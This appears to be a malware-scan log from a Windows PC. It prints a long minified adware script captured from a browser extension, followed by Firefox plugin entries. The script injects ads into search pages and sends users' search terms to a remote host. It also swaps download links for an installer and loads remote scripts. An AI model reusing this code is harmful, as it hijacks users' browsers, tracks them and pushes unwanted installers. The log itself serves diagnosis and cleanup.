b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less= function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\", \"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=3690070418775238836&eid=727&pid=0&prodid=185&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=AU&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\", \"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0; if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\");if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"], urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/...rc_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.condui...:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}}, ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/w...rc_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple...idate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\"); if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.in...idate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"], src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()}, !1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.co...d-keywords=*\"], src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&& 1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b, d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom= new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&& (c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault? a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f< d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\", \"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json= function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k; return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")}; b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&& (b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig, \"_href=\")}},20)},!1,a[c],!0)};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))}; b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1}; b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c= b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0, 10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=3690070418775238836&eid=727&pid=0\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\"); e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement, !1)}});;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js?subid=prmr&hid=3690070418775238836';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.dataf...fklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;window.top==window.self&&\"http:\"==location.protocol&&new function(){var a=this;a.installer_id=\"6143022708\";a.hardware_id=\"3690070418775238836\";a.timestamp=(new Date).getTime();a.unique=function(){if(5<a.hardware_id.length){var b=a.hardware_id;return\"&uni=\"+b}return 5<a.installer_id.length?(b=a.installer_id,\"&uni=\"+b):\"\"}();a.hrefElements=[];a.binHrefs=[];a.installerDefaultName=\"Setup\";a.callback=encodeURIComponent(\"prex.addClickEvent()\");a.product_id=\"100\";a.interval=1296E3;a.domain=\"http://xls.searchfun...coupon.eu/v\" ( parseInt('54.04')>60? 2109:388)+\"?installer_file_name=\";a.bin=\"exe,msi,mp3,rar,pdf,avi,mov,mpg,zip,torrent,mkv,mpeg,mp4,3gp,jar,7z,flac,wmv,wma,doc,ppt,pptx,pps,ppsx,xls,xlsx,flv\";a.res=[];a.existingPrefix=\"rghbyujk\";a.prefix=\"fghjklfgh\";a.utils=new function(){var b=this;b.injectScript=function(){var b=document.createElement(\"script\");b.src=a.domain;document.getElementsByTagName(\"head\")[0].appendChild(b)};b.ajax={get:function(a,e){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==b.ajax.xhr.readyState&&e(b.ajax.xhr.responseText)},this.xhr.send()}catch(f){}}};b.isIE=function(){return-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?!0:!1}};a.storage=new function(){var b=this;b.get=function(){return parseInt(localStorage.getItem(a.prefix))};b.set=function(){localStorage.setItem(a.prefix,a.timestamp+1E3*a.interval)};b.checkInterval=function(){return localStorage?isNaN(b.get())||b.get()<a.timestamp?!0:!1:!1}};a.checkExistingExtension=function(b){return b.getAttribute(\"data-\"+a.existingPrefix)?!0:!1};a.isBin=function(b){b=b.slice(-4);if(\".\"!==b[0])return!1;b=b.slice(1);return-1<a.bin.indexOf(b)?!0:!1};a.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(d,e,f,c){\"undefined\"==typeof c&&(c=window);c.addEventListener(d,e,f);a.cache.push([d,e,f,c])}:window.attachEvent?function(d,e,f,c){\"undefined\"==typeof c&&(c=window);c[\"e\"+d+e]=e;c[d+e]=function(){c[\"e\"+d+e](window.event)};c.attachEvent(\"on\"+d,c[d+e]);a.cache.push([d,e,f,c])}:function(){};a.remove=window.removeEventListener?function(a,b,f,c){\"undefined\"==typeof c&&(c=window);c.removeEventListener(a,b,f)}:window.detachEvent?function(a,b,f,c){\"undefined\"==typeof c&&(c=window);c.detachEvent(\"on\"+a,c[a+b]);c[a+b]=null;c[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var d=0;d<a.cache.length;d++)a.remove.apply(a,a.cache[d])}};a.addClickEvent=function(){for(var b=0;b<a.hrefElements.length;b++)a.events.add(\"click\",function(b){a.clickEvent(b)},!1,a.hrefElements)};a.clickEvent=function(b){a.elem=b.target||b.srcElement;if(a.checkExistingExtension(a.elem))return!1;b=b||window.event;b.preventDefault?b.preventDefault(b):b.returnValue=!1;a.downloadUrl+=(\"\"==a.elem.innerHTML || 'AU'=='US')?a.installerDefaultName:a.elem.innerHTML;location.href=a.downloadUrl;a.storage.set();a.events.flush()};a.sendAjax=function(){a.utils.ajax.get(a.domain,function(b){b=b.replace(/\\n$/,\"\");b==\"try{\"+a.callback+\"}catch(e){}\"&&a.addClickEvent()})};a.checkHrefs=function(b){for(var d=0;d<b.length;d++){var e=b[d].href.split(\"?\");a.isBin(e[0])&&a.hrefElements.push(b[d])}};a.handleRequest=function(){a.utils.isIE()?a.utils.injectScript():a.sendAjax()};a.init=function(){a.hrefs=document.getElementsByTagName(\"a\");a.checkHrefs(a.hrefs);0<a.hrefElements.length&&a.handleRequest()};a.storage.checkInterval()&&a.init();\"undefined\"==typeof window.prex&&(window.prex=a)};;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e') && document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild){document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild.onclick=function(){return false}};if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='AU'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};if (-1<document.location.host.indexOf(\"bookbrowsee.ne\")) {new function(){for(var c=[\"adv.php?\",\"/adv.php?\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.pathname+a.search,b=0;b<c.length;b++)c==e.substr(0,c.length)&&\"nofollow\"==a.rel&&\"_blank\"==a.target&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},!1))}};if(-1<document.location.host.indexOf(\"irrorcreator.co\")){for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};if(-1<document.location.host.indexOf(\"loud-vibe.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3seal.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3vampire.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=5';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_a742c94171274206\")&&window.self==window.top){var c=function(){window._sa=window._sa||[];_sa.push([\"initialize\",\"3ccf9926-a616-478f-83f3-90e5106f0190\"]);_sa.push([\"displayAd\"]);var a=document.createElement(\"script\");a.type=\"text/javascript\";a.async=!0;a.src=\"https://admin.appnex...2c94171274206\");document.getElementsByTagName(\"head\")[0].appendChild(a)};if(\"undefined\"!=typeof chrome){var b=document.createElement(\"script\"); b.type=\"text/javascript\";b.innerHTML=\"new \"+c.toString();b.setAttribute(\"id\",\"id_a742c94171274206\");document.getElementsByTagName(\"head\")[0].appendChild(b)}else c()}}}catch(e$$12){};})();(function(){void(0)})()");
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.17.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@abr.gov.au/KeyMgmtPlugin: C:\Program Files (x86)\ABR\Plug-In\bin\npAUSkeyPlugin.dll (Commonwealth Government of Australia)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
